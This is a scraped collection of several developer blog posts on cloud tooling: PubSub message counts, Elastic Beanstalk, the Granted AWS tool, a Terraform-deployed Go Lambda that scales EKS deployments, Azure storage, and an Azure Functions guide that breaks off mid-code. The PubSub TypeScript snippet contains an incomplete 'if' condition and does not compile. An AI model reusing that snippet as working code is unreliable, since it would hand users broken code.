as fontes borradas. ## Problemas? Caso não houve alterações, então o passo seguinte será alterar o Runtime da IDE. Com o atalho <code>CTRL + SHIFT + A</code> procure por <code>Choose Boot Java Runtime for the IDE</code> ![Choose Boot Java Runtime for the IDE](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gnzp212dbprvashy01v0.png) Com a opção de _Runtimes_ aberto, procure pelo campo de selação <code>New</code> e selecione a opção <code>Add Custom Runtime</code> e <code>Add JDK</code>, então adicione a JDK 21 obtida nos passos iniciais desse tutorial. 1. ![Exemplo de configuração de runtime da JDK](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6nvw6ct6j0e82dy8qko5.png) 2. ![JDK 21](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iyy8uuzwwewgqfuzz4sl.png) Clique em <code>OK</code> e reinicie a IDE ## Dicas Como fiquei na dúvida se houve mesmo uma alteração (Minha visão não está tão boa no momento) tenho dois IntelliJ no PC, um via Flatpak e outro em tar.gz, então coloquei ambos lado a lado se fiz minhas comparações. ## Nota - Caso queira fazer o tutorial para IntelliJ ou Android Studio instalados de outra forma, recomendo pesquisar como reproduzir os passos em um contexto fora do flatpak. - Para mais informações consulte a issue no github sobre os testes do IntelliJ no Wayland em https://github.com/JetBrains/JetBrainsRuntime/issues/242
danroxha
1,910,966
Google PubSub: Number of Unread Messages
This week, I explored different techniques for handling long-running tasks, such as calls to Language...
0
2024-07-04T22:50:41
https://dev.to/shannonlal/google-pubsub-number-of-unread-messages-57jh
pubsub, googlecloud, typescript
This week, I explored different techniques for handling long-running tasks, such as calls to Language Learning Models (LLMs), and decided to introduce a queue to better manage our requests. To achieve this, I deployed a Google PubSub Topic, which helps in efficiently managing and processing our requests. However, we also wanted to provide our users with an estimate of how long it would take before their task is completed. To accomplish this, I needed to determine the approximate number of unread messages in the topic. After examining the Google PubSub API, I discovered that it doesn't provide direct access to the number of unread messages. However, I found an alternative solution using Google Metric Explorer. By leveraging the metrics available through this tool, I was able to retrieve the necessary data to estimate the number of unread messages in the PubSub topic. In the following section, I will share some TypeScript code that demonstrates how this works. The first thing you need to do is install the google packages ``` npm install @google-cloud/monitoring @google-cloud/pubsub ``` The key metric you are looking for is number of undelivered messages. Google Metric Explorer has an UI that you can build to run queries on different parts of your infrastructure. The following is a MQL that I used to query one of my topic to get the unread messages ``` fetch pubsub_subscription | metric 'pubsub.googleapis.com/subscription/num_undelivered_messages' | filter (resource.resource.subscription_id == '${subscriptionName}') | group_by 1m, [value_num_undelivered_messages_mean: mean(value.num_undelivered_messages)] | every 1m | group_by [], [value_num_undelivered_messages_mean_aggregate: aggregate(value_num_undelivered_messages_mean)] ``` The following is the code you can use to connect to run the above query to get the number of unread messages for you topic ``` import monitoring from '@google-cloud/monitoring'; async getUnackedMessages(topicId: string, projectId:string, region: string): Promise<number> { const monitoringClient = new monitoring.QueryServiceClient(); try { const queryRequest = { name: `projects/${projectId}`, query: 'QUERY FROM ABOVE', }; const [response] = await monitoringClient.queryTimeSeries(queryRequest); if ( response.length > 0 && ) { return Number(response[0].pointData[0].values[0].doubleValue); } else { return 0; //Default condition } } catch (error) { console.error('Error fetching unacked messages:', error); throw error; } } ``` The above code works well; however, there are a couple of things you need to keep in mind. Firstly, this is not a real-time API, so if you are adding messages to your topics, the changes will not be immediately reflected. I believe this has to do with how PubSub pushes messages to its subscribers. Lastly, I occasionally noticed that sometimes when calling this API, I would get an empty array back instead of the expected responses. If you have any comments, questions, or insights regarding this approach, please feel free to reach out to me. I'm always eager to learn from the community and discuss ways to improve and optimize our solutions.
shannonlal
1,912,031
Deploying a Node.js Application on AWS Elastic Beastalk
Deploying applications to AWS Elastic Beanstalk is straightforward and ideal for quickly deploying...
0
2024-07-04T22:41:48
https://dev.to/fabiola_estefanipomamac/deploying-a-nodejs-application-on-aws-elastic-beastalk-2nld
Deploying applications to AWS Elastic Beanstalk is straightforward and ideal for quickly deploying Node.js applications without managing infrastructure. We'll deploy a basic Node.js application using Express.js to AWS Elastic Beanstalk. Example Application **Setup Your Project** ``` mkdir nodejs-app cd nodejs-app npm init -y ``` **Install Dependencies** ``` npm install express ``` **Create The Application** ``` const express = require('express'); const app = express(); app.get('/', (req, res) => { res.send('Welcome to AWS Elastic Beanstalk Deployment!'); }); const port = process.env.PORT || 3000; app.listen(port, () => { console.log(`Server running on port ${port}`); }); ``` **Create .ebextensions Directory** ``` option_settings: aws:elasticbeanstalk:container:nodejs: NodeCommand: "app.js" ``` **Deploy to AWS Elastic Beanstalk** 1. Sign in to AWS Management Console and navigate to Elastic Beanstalk. 2. Create a new application and environment, selecting Node.js platform. 3. Upload your application code (including app.js, package.json, and node_modules if necessary). 4. Deploy your application. **Access Your Application** Once deployed, Elastic Beanstalk will provide you with a URL to access your application (http://app-name.elasticbeanstalk.com).
fabiola_estefanipomamac
1,912,030
The Importance of Using Granted for Managing Multiple AWS Accounts
Introduction Managing multiple AWS accounts can be overwhelming. Switching between...
0
2024-07-04T22:35:35
https://dev.to/fernandomullerjr/the-importance-of-using-granted-for-managing-multiple-aws-accounts-203c
aws, cloud, devops, sre
## Introduction Managing multiple AWS accounts can be overwhelming. Switching between accounts, remembering credentials, and handling permissions are just a few challenges. Enter Granted—a tool designed to streamline and secure your AWS account management. This post delves into how Granted can transform your AWS experience, enhancing productivity and security. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t20vrlcuat7svxozwc0i.png) ## The Challenges of Managing Multiple AWS Accounts Handling multiple AWS accounts involves juggling different credentials, switching between various consoles, and managing permissions effectively. This complexity can lead to security risks and inefficiencies, making the need for a streamlined solution crucial. ## What is Granted? Granted is a tool that simplifies the process of managing multiple AWS accounts. It allows users to access all their AWS accounts with a single command, manage permissions seamlessly, and enhance security with multifactor authentication and encryption. Detailed article explaining installation and usage: [https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/](https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/) ## Benefits of Using Granted ### Easy Access Granted enables quick and easy access to all your AWS accounts using a single command. No more juggling multiple credentials or constantly switching between consoles. ### Simplified Permission Management With Granted, you can define and control permissions across all your AWS accounts from one central place. This granular control ensures that only authorized users have access to specific resources, enhancing overall security. ### Enhanced Security Granted employs multifactor authentication and encryption to protect your AWS accounts from unauthorized access. This added layer of security ensures that your accounts remain safe and secure. ### Increased Productivity By automating account management tasks such as switching between accounts and handling permissions, Granted boosts productivity. Users can focus more on their core tasks rather than administrative overhead. ## How to Use Granted Suppose you have three AWS accounts: development, testing, and production. With Granted, you can easily: Access any account with a single command. Set different permissions for each account. Automate the switching process, saving time and effort. ## Conclusion Granted is an essential tool for anyone managing multiple AWS accounts. It simplifies access, enhances security, and boosts productivity. By integrating Granted into your workflow, you can manage your AWS environments more efficiently and securely. ## FAQs 1. What is Granted? Granted is a tool that simplifies managing multiple AWS accounts by providing easy access, simplified permissions, and enhanced security. 2. How does Granted improve security? Granted uses multifactor authentication and encryption to protect AWS accounts from unauthorized access. 3. Can Granted improve productivity? Yes, by automating tasks like switching between accounts and managing permissions, Granted significantly boosts productivity. 4. Is Granted easy to use? Absolutely, Granted allows users to access all their AWS accounts with a single command, making it user-friendly. 5. Where can I learn more about Granted? For more information, visit the [Granted website](https://www.granted.dev/). Or check this detailed article: [https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/](https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/)
fernandomullerjr
1,911,791
One tool to rule them all - Terraform: EKS Golang Client & E2E AWS Lambda CI/CD via IaC
Table of Contents Introduction Prerequisites Lambda RBAC permissions Farewell ...
0
2024-07-04T22:33:59
https://dev.to/wardove/from-code-to-cloud-with-terraform-eks-golang-client-e2e-aws-lambda-cicd-with-iac-2id8
aws, terraform, go, devops
## Table of Contents <a name="Toc"></a> 1. [Introduction](#introduction) 2. [Prerequisites](#prerequisites ) 3. [Lambda RBAC permissions](#rbac) 4. [Farewell](#farewell) ![Architecture-Flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dzoty4yi6pimjb8lxxaw.gif) ## Introduction <a name="introduction"></a> Hey Folks! In this article, we delve into the seamless integration of Terraform for deploying compiled Lambda functions. During the process I will showcase how AWS Lambda can be effectively used as a Kubernetes client. And as final layer of our sandwich - E2E Terraform CI/CD with GitHub Actions to facilitate continuous infrastructure provisioning and software delivery all in one! So, here is some backstory. Previously, I wondered how to facilitate a more reactive and event driven interaction with my EKS cluster in a cloud-native environment. And naturally when I think of event-driven approach in AWS context - lambdas and EventBridge are one of the first things that come to mind, and for a good reason 😁 right? Combination of these 2 can provide endless number of solutions for various problems - where an action is needed based on some event or some specific schedule. We will be looking at one of them, particularly - "How to scale down EKS workloads on a scheduled basis". ![serverless-deploy](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h6u7vkuzjxaxps22hqmu.png) We will be using my humble EKS-downscaler app. As a client, it provides similar functionality to an [operator with the same name](https://codeberg.org/hjacobs/kube-downscaler). This app is conceptual and serves as an example of how AWS Lambdas can interact with Kubernetes. With our solution, we will specify namespaces and cron expressions, and Terraform coupled with downscaler lambda will handle everything. This article will showcase Terraform from a perfect angle - as it will be our main tool to manage continuous configuration changes, provision and manage cloud resources, and deliver seamless code-to-Lambda deployment. This approach can be used as a standalone terraform project or integrated into more complex IaC projects by passing inputs directly (e.g., "var.cluster_name" that is required as input could have been passed via remote state or directly from root/child module where we create the eks cluster). ## Prerequisites <a name="prerequisites"></a> As you might have guessed, we have some prerequisites: - Terraform - AWS CLI - Go runtime - EKS cluster You can provision and [create and manage your EKS cluster](https://docs.aws.amazon.com/eks/latest/userguide/create-cluster.html) in any way you prefer. It might be App of Apps, eksctl, or manual provisioning, as it is very individual. However, I will be showcasing example kubernetes resources with Terraform code examples. So, as mentioned earlier - with our EKS cluster managed via Terraform, this project can be a part of it as a separate module or a standalone project decoupled from main code basis. In this article, it will be separate. ## Lambda RBAC permissions <a name="rbac"></a> To enable our Lambda function to interact with the EKS cluster, we need to grant it specific permissions using Role-Based Access Control (RBAC). This involves defining a Kubernetes group, by creating a cluster role, and establishing a cluster role binding. I am creating those using my main EKS Terraform project. You can go ahead and do the same manually 🙃 Further, We can associate this group with our Lambda role by [creating an access entry](https://docs.aws.amazon.com/eks/latest/userguide/access-entries.html) in the separate project where we will provision the Lambda itself or right in the main eks project or once again go and do it manually via console. For now let's just create RBAC components: ```hcl resource "kubernetes_cluster_role" "lambda" { metadata { name = "lambda-clusterrole" } rule { api_groups = ["*"] resources = ["deployments", "deployments/scale", "statefulsets", "daemonsets", "jobs"] verbs = ["get", "list", "watch", "create", "update", "patch", "delete"] } } resource "kubernetes_cluster_role_binding" "lambda" { metadata { name = "lambda-clusterrolebinding" } role_ref { api_group = "rbac.authorization.k8s.io" kind = "ClusterRole" name = kubernetes_cluster_role.lambda.metadata[0].name } subject { kind = "Group" name = "lambda-group" api_group = "rbac.authorization.k8s.io" } } ``` EKS Lambda Client Now, let's dive into the heart of our project: the EKS Lambda Client. You'll find all the relevant code to deploy our Lambda function using Terraform in [this GitHub repo](https://github.com/WarDove/eks-downscaler). ``` eks-downscaler ├── .github │ └── workflows │ └── terraform.yml ├── lambdas │ └── downscaler │ ├── go.mod │ └── main.go │ ├── modules │ └── downscaler │ ├── iam.tf │ ├── lambda.tf │ ├── locals.tf │ ├── scheduler.tf │ └── variables.tf ├── backend.sh ├── backend.tf ├── main.tf ├── readme.md ├── terraform.tfvars └── variables.tf ``` Our repository contains both the Golang Lambda code and the Terraform scripts that manage its deployment. We'll be exploring each component step-by-step, starting with the Terraform S3 backend bootstrapper script. As always this is where the magic begins, setting up the backend for our infrastructure. > backend.sh ```bash #!/bin/bash set -euo pipefail PROJECT_NAME=$(basename "$(dirname \"${PWD}\")") AWS_REGION=${AWS_REGION:-us-east-2} AWS_PROFILE=${AWS_PROFILE:-default} AWS_ACCOUNT_ID="$(aws sts get-caller-identity --query Account --output text --profile ${AWS_PROFILE})" export AWS_PAGER="" echo -e "Bootstraping terraform backend...\n" echo PROJECT_NAME: "${PROJECT_NAME}" echo AWS_REGION: "${AWS_REGION}" echo AWS_PROFILE: "${AWS_PROFILE}" echo AWS_ACCOUNT_ID: "${AWS_ACCOUNT_ID}" echo BUCKET NAME: "terraform-tfstate-${PROJECT_NAME}" echo DYNAMODB TABLE NAME: terraform-locks echo -e "\n" aws s3api create-bucket \ --region "${AWS_REGION}" \ --create-bucket-configuration LocationConstraint="${AWS_REGION}" \ --bucket "terraform-tfstate-${PROJECT_NAME}" \ --profile "${AWS_PROFILE}" aws dynamodb create-table \ --region "${AWS_REGION}" \ --table-name terraform-locks \ --attribute-definitions AttributeName=LockID,AttributeType=S \ --key-schema AttributeName=LockID,KeyType=HASH \ --provisioned-throughput ReadCapacityUnits=1,WriteCapacityUnits=1 \ --profile "${AWS_PROFILE}" cat <<EOF > ./backend.tf terraform { required_providers { aws = { source = "hashicorp/aws" version = "~> 5.57" } } required_version = ">=1.9.0" backend "s3" { bucket = "terraform-tfstate-${PROJECT_NAME}" key = "${PROJECT_NAME}" region = "${AWS_REGION}" dynamodb_table = "terraform-locks" } } provider "aws" {} EOF echo -e "\nBackend configuration created successfully!\n" cat ./backend.tf ``` This script bootstraps a Terraform backend for managing state files. It captures the project name, AWS region, profile, and account ID. Then, it creates an S3 bucket and a DynamoDB table for state file storage and locking, respectively. Finally, it generates a backend.tf configuration file, linking Terraform to the newly created S3 bucket and DynamoDB table, ensuring secure and organized state management. So to initialize first you will need to define your Access credentials either by using AWS_PROFILE or AWS_SECRET_ACCESS_KEY & AWS_ACCESS_KEY_ID. ## Main Configuration File > It would be redundant to go over every file in our repo, as the hcl + go code is defined in idiomatic way, and all the nitty-gritty part should be clear already (iam role and policies for lambda to describe our cluster, EventBridge scheduler resource and its permissions.. all the extras and bla bla bla..) Our main.tf is the main spot where we define all the configuration for our client. This file references the downscaler module, specifying the EKS cluster name, Lambda source path, scaling schedules, and namespaces to manage. It's like the conductor of an orchestra, ensuring every component works in perfect harmony. ```hcl module "downscaler_lambda_client" { source = "./modules/downscaler" eks_cluster_name = var.cluster_name ci_env = var.ci_env lambda_source = "${path.root}/lambdas/downscaler" scale_out_schedule = "cron(00 09 ? * MON-FRI *)" scale_in_schedule = "cron(00 18 ? * MON-FRI *)" eks_groups = ["lambda-group"] namespaces = ["development", "test"] } ``` ## Lambda Deployment Process Now, let's talk about how we build, zip, and deploy our Lambda function in `modules/downscaler/lambda.tf`. ```hcl resource "null_resource" "lambda_build" { provisioner "local-exec" { working_dir = var.lambda_source command = "go mod tidy && GOARCH=amd64 GOOS=linux go build -o bootstrap main.go" } triggers = { ci_env = var.ci_env file_hash = md5(file("${var.lambda_source}/main.go")) } } data "archive_file" "lambda_zip" { depends_on = [null_resource.lambda_build] type = "zip" source_file = "${var.lambda_source}/bootstrap" output_path = "${var.lambda_source}/main.zip" } resource "aws_lambda_function" "downscaler_lambda" { filename = data.archive_file.lambda_zip.output_path source_code_hash = data.archive_file.lambda_zip.output_base64sha256 function_name = var.project_name handler = "main" runtime = "provided.al2023" role = aws_iam_role.lambda_role.arn environment { variables = { CLUSTER_NAME = var.eks_cluster_name } } } resource "aws_eks_access_entry" "lambda" { cluster_name = var.eks_cluster_name principal_arn = aws_iam_role.lambda_role.arn kubernetes_groups = var.eks_groups type = "STANDARD" } ``` - Building the Lambda: We begin by checking for changes in our main.go file. Using a hash function, we detect any modifications and trigger a rebuild of the Lambda function. This ensures our deployment is always up-to-date with the latest code changes. - We also have a cheeky `ci_env = var.ci_env` trigger here, which identifies if we are running the project locally or from CI. Motive is to rebuild our application every time if we are applying in Github Actions CI Context. - Zipping the Lambda: After building the Lambda, we zip the compiled executable. This zipped file becomes the core package for our Lambda function, ready for deployment. - Deploying the Lambda: With Terraform, we deploy the Lambda function using the zipped file. Terraform handles all the heavy lifting, ensuring the Lambda is correctly set up and configured to interact with our EKS cluster. - Assigning Permissions: We also need to attach the necessary permissions (previously created RBAC resources) to local Lambda role by using [Access Entries](https://docs.aws.amazon.com/eks/latest/userguide/access-entries.html#creating-access-entries). - All AWS sided permissions -> iam resources - roles, necessary policies are defined in [iam.tf](https://github.com/WarDove/eks-downscaler/edit/main/modules/downscaler/iam.tf) file ![access-entries](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/un0oe1ti8d9lxwxh0a3j.png) This elegant process, managed by Terraform, ensures that our Lambda function is built, zipped, and deployed seamlessly. ## Lambda client code ```go package main import ( "context" "encoding/json" "github.com/aws/aws-lambda-go/lambda" eksauth "github.com/chankh/eksutil/pkg/auth" log "github.com/sirupsen/logrus" autoscalingv1 "k8s.io/api/autoscaling/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/client-go/kubernetes" "os" ) type Payload struct { ClusterName string `json:"clusterName"` Namespaces []string `json:"namespaces"` Replicas int32 `json:"replicas"` } func main() { if os.Getenv("ENV") == "DEBUG" { log.SetLevel(log.DebugLevel) } lambda.Start(handler) } func handler(ctx context.Context, payload Payload) (string, error) { cfg := &eksauth.ClusterConfig{ ClusterName: payload.ClusterName, } clientset, err := eksauth.NewAuthClient(cfg) if err != nil { log.WithError(err).Error("Failed to create EKS client") return "", err } scaled := make(map[string]int32) for _, ns := range payload.Namespaces { deployments, err := clientset.AppsV1().Deployments(ns).List(ctx, metav1.ListOptions{}) if err != nil { log.WithError(err).Errorf("Failed to list deployments in namespace %s", ns) continue } for _, deploy := range deployments.Items { if err := scaleDeploy(clientset, ctx, ns, deploy.Name, payload.Replicas); err == nil { scaled[ns+"/"+deploy.Name] = payload.Replicas } } } scaledJSON, err := json.Marshal(scaled) if err != nil { log.WithError(err).Error("Failed to marshal scaled deployments to JSON") return "", err } log.Info("Scaled Deployments: ", string(scaledJSON)) return "Scaled Deployments: " + string(scaledJSON), nil } func scaleDeploy(client *kubernetes.Clientset, ctx context.Context, namespace, name string, replicas int32) error { scale := &autoscalingv1.Scale{ ObjectMeta: metav1.ObjectMeta{ Name: name, Namespace: namespace, }, Spec: autoscalingv1.ScaleSpec{ Replicas: replicas, }, } _, err := client.AppsV1().Deployments(namespace).UpdateScale(ctx, name, scale, metav1.UpdateOptions{}) if err != nil { log.WithError(err).Errorf("Failed to scale deployment %s in namespace %s", name, namespace) } else { log.Infof("Successfully scaled deployment %s in namespace %s to %d replicas", name, namespace, replicas) } return err } ``` Our Lambda client code adds the last piece of logic behind scaling operations in the EKS cluster. It starts by defining a Payload structure, which includes the cluster name, namespaces, and desired replicas. The main function sets up the Lambda handler, which initiates the scaling process. And obviously we are picking the name of the cluster as an environment variable - which is originally propagated via terraform resource. The handler creates an EKS client, lists deployments in the specified namespaces, and scales each deployment to the desired number of replicas. The scaled deployments are then logged and returned as a JSON response. This ensures our deployments are dynamically scaled based on the defined schedules, providing efficient resource management. Naturally, all logs flow directly to CloudWatch Logs, where we can observe all the details regarding invocations and it's output. ## Terraform CI/CD It's continuous delivery and continuous provisioning time! 🚀🚀🚀 Our CI/CD workflow is defined in the `terraform.yml` file within the `.github/workflows` directory. This workflow ensures that our Terraform configurations are automatically applied whenever changes are pushed to the main branch. ```yaml name: Terraform CI/CD run-name: "Terraform CI/CD | triggered by @${{ github.actor }}" on: push: branches: - 'main' jobs: terraform-apply: runs-on: ubuntu-latest env: TF_VAR_cluster_name: ${{ secrets.CLUSTER_NAME }} TF_VAR_ci_env: true AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} AWS_REGION: us-east-2 steps: - uses: actions/checkout@v4 - uses: hashicorp/setup-terraform@v3 with: terraform_version: 1.9.0 - name: Terraform Init run: terraform init - name: Terraform Validate run: terraform validate - name: Terraform Apply run: terraform apply -auto-approve ``` The CI/CD pipeline kicks off by checking out the code from the repository and setting up Terraform. It then initializes Terraform, validates the configuration, and applies the changes to deploy our infrastructure. > It is always better to have extra linting/testing/scanning in terraform CI, another topic for another day maybe😉 ![Terraform apply Successfull!](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/34fzwfavzsk1mvv9kyum.png) ### Secrets and Environment Variables Key secrets and environment variables are passed into the workflow to ensure secure and proper configuration. We use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` for authenticating with AWS, and `CLUSTER_NAME` to specify the EKS cluster name. These secrets are securely stored in GitHub's repository settings. ![Adding GHA Secrets](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/69g5p57e5xod4puj7bt8.png) As you may already know `TF_VAR_` prefix, is handy to override/define values via environment variables - especially in CI environment. This ensures that even if variables are defined elsewhere or gitignored (in our case tfvars files are gitignored), our CI/CD pipeline uses the CI values. For example, `TF_VAR_ci_env` is set to `true` in the CI environment, enforcing rebuilds (via local-provisioner trigger) and ensuring changes are accurately reflected in the deployment. ## Farewell 😊 <a name="farewell"></a> ![goodbye](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qvju7igtuysnmhng7ubt.gif) In this article, we’ve explored a comprehensive method for deploying and managing AWS resources using Terraform, AWS Lambda, and EventBridge. We delved into the seamless integration of Terraform for deploying compiled Lambda functions, showcased how AWS Lambda can effectively interact with EKS, and implemented full-scale automation with GitHub Actions. These three pearls highlight the power of Terraform in creating a cohesive and dynamic deployment strategy. Thank you for following along. I hope this guide has provided you with valuable insights and can serve as a reference for your future projects. Keep exploring, keep learning, and continue refining your cloud practices! ![Sauron](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sode6jxhfy1uk7bz1d0i.gif) > "One tool to rule them all, one tool to deploy them, One tool to automate 'em, and with terraform apply them; in the cloud where serverless hides"
wardove
1,910,925
Creating Shared File Storage in Microsoft Azure
In this guide, we will walk through the steps to create a shared storage account in Microsoft Azure....
0
2024-07-04T22:26:46
https://dev.to/jimiog/creating-shared-file-storage-in-microsoft-azure-4a1g
azure, microsoft, cloud, cloudstorage
In this guide, we will walk through the steps to create a shared storage account in Microsoft Azure. We'll cover creating a storage account, setting up a file share, managing snapshots, and restricting access to selected virtual networks. ## Creating a Storage Account 1. **Create a Storage Account:** - Create a Resource Group for your storage and assign it a name. - Choose Performance as Premium and set the account type to File Shares. - Set Redundancy to Zone-Redundant storage. - Create the resource and navigate to it. ![Configuring Storage Account](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/buinfsv9j1tnmoqb0lwb.jpg) 2. **Setting up File Shares:** - In the Data Storage section, select File Shares. ![Locating File Shares](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xop03yogwg2feifb8b5i.jpg) - Click on +File Share and create a name for the file share. ![Adding a File Share](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/47lpklftt2isink2icid.jpg) - Leave other settings as default and click Review+Create, then click Create. ![Creating the File Share](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0mucfq6f8gmxjvvuv41i.jpg) 3. **Adding a Directory:** - Click on +Add Directory and give your directory a name. ![Adding a directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7tzhfhwt6c2qgvp8hm5h.jpg) - Navigate to your newly created directory and upload a file of your choice. ![Navigating to new Directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b9cmeo18lsz8kpworq6y.jpg) ![Uploading file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aiq18xfmohj8g01jk0ss.jpg) 4. **Configuring and Testing Snapshots:** - Go back to your File Share, select Operations, and click Snapshots. ![Locating snapshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wlupnjygq4i8m9hf5fjs.jpg) - Click +Add Snapshot, optionally add a comment, and confirm. ![Adding snapshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/plpteucg23osee9se8xw.jpg) - Ensure your directory is included in the snapshot. ![Looking at directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/61gz4xxbgkirwcyyx0bi.jpg) - Test the snapshot functionality by deleting the uploaded file, then restore it from the snapshot. 5. **Restricting Storage Access to Virtual Networks:** - Create a Virtual Network: - Search for "Virtual Network" and create a new one with default settings. ![Locating Virtual Network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ft3c4aw5hys9gv93dta5.jpg) ![Configuring a Virtual Network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aog7sh7dna6eznvaksf7.jpg) - Navigate to the subnet settings, select the default subnet, and enable "Microsoft.Storage" under Service Endpoints. ![Locating Subnets](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/12vfhs8dyhhzfv45st0s.jpg) ![Clicking the default subnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tcgbm0bnw1wljawmb8bg.jpg) ![Choosing the service endpoint](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j1t8zh32nwjpogkhm2it.jpg) 6. **Configure Network Access for the Storage Account:** - Return to your File Storage account. - In the Security+Networking section, click on Networking. ![Find networking](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q3ihx5cad3zngmzi2s82.jpg) - Enable access from selected virtual networks and IP addresses. - Add the virtual network you created earlier and select the default subnet. - Save the settings. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4c8w3qppv75zmr1xiivw.jpg) 7. **Verification:** - Navigate back to your File Share and ensure access is restricted to the specified virtual network. ![Restricted Access](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sxfmclt97vbb8689bx9f.jpg) ## Cleanup Remember to delete all resources created during this process to avoid unnecessary charges. By following these steps, you have successfully created a File Share, configured snapshots for your files, and restricted access to a virtual network.
jimiog
1,910,836
Creating Private Storage in Microsoft Azure
We'll be going over creating a storage account and adding files for private access. Feel free to look...
0
2024-07-04T22:26:22
https://dev.to/jimiog/creating-private-storage-in-microsoft-azure-5803
azure, cloud, cloudstorage, microsoft
We'll be going over creating a storage account and adding files for private access. Feel free to look at my many posts discussing how to do this if you're confused. 1. **Create a Storage Account and Configure High Availability** - Ensure Geo-redundant storage (GRS) is selected when creating your storage account. - Once your storage account is created, navigate to the resource. ![Creating the storage account](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oebhtb7cquns98h7jo6p.jpg) 2. **Create a Storage Container, Upload a File, and Restrict Access** - Locate the **Data storage** section and select **Containers**. ![Locating Containers](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aviny8unxfd3m2y1zqmi.jpg) - Click **+Container**, create a name for your container, then click **Create**. ![Creating the Container](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/56y9524buno2edbbjh9j.jpg) - Navigate to your created container, click **Upload**, add a file, and click **Upload**. ![Uploading a file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ehgjd23z80246gqr1z02.jpg) - Click the file you uploaded, copy the URL link, and paste it into your browser to confirm you're unable to view the file. ![Copying the blob link](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ydrdtnaxg6kfc11d41c8.jpg) ![Verifying the file in inaccessible](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hsbmwcpg8rwo7o2cqero.jpg) 3. **Configure Access with a Shared Access Signature (SAS)** - Go back to your file and click on **Generate SAS**. ![Clicking Generate SAS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/brkmv2lv1mwt89y4kilu.jpg) - Set permissions to **Read** and adjust the **Expiry** to 24 hours from the current time. - Click **Generate SAS token and URL**. ![Configuring expiration time](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bzvvzw8uuwsd3qmt1qs8.jpg) - Copy the generated Blob SAS URL and paste it into your browser to verify access. ![Copying the URL](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/958z9mvireezyp64puld.jpg) ![Viewing the uploaded file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8myd7d790rc92hguqn6y.jpg) 4. **Configure Storage Access Tiers and Content Replication** - Move blobs from the Hot tier to the Cool tier after 30 days to optimize costs. - Navigate back to the overview of your Storage Account. - Locate **Lifecycle Management** under **Data Management**. ![Changing the lifecycle](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9kjyiu0wpy7n1pc1nhaf.jpg) - Click **Add a rule**. ![Locating the Lifecycle Rules](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nsy8ray8klflsq31w4r7.jpg) - Create a name for your rule, leave other settings as default, and click **Next**. ![Naming the rule](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zgrxngqnebu1q15r92pj.jpg) - Set the if condition to **Last Modified** and change **More than (days ago)** to **30**. - Change the then condition to **Move to cool storage** and click **Add**. ![Creating the rule conditions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6y7bzvzcnop1opsrpd2w.jpg) We've now configured a lifecycle policy for our private files. Remember to delete all resources once you're done.
jimiog
1,912,028
Implementing a Serverless Application with Azure Functions
In this article, we will walk through step-by-step how to create and deploy a serverless function...
0
2024-07-04T22:21:26
https://dev.to/dylantv/implementing-a-serverless-application-with-azure-functions-9bn
In this article, we will walk through step-by-step how to create and deploy a serverless function using Azure Functions. We'll use a practical example of an HTTP function that greets users based on the name provided in the request. Step 1: Creating the Function in Azure Functions 1) Access Azure Portal: - Sign in to portal.azure.com using your Azure credentials. 2) Create a New Resource: - Click on "+ Create a resource" in the upper left corner. -Search for and select "Azure Function" in the Azure marketplace. -Configure basic details like subscription, resource group, function name, and location. 3) Function Configuration: - Choose the consumption plan to leverage serverless execution. - Select the "HTTP trigger" template to start with a basic HTTP trigger. 4) Create the Function: - Click on "Review and create" and then "Create" to deploy the function in Azure. Step 2: Implementing the Function Code 1) Function Development: - Implement the following code in your function. This code will handle GET and POST requests to greet the user based on the provided name. csharp ``` using System.IO; using Microsoft.AspNetCore.Mvc; using Microsoft.Azure.WebJobs; using Microsoft.Azure.WebJobs.Extensions.Http; using 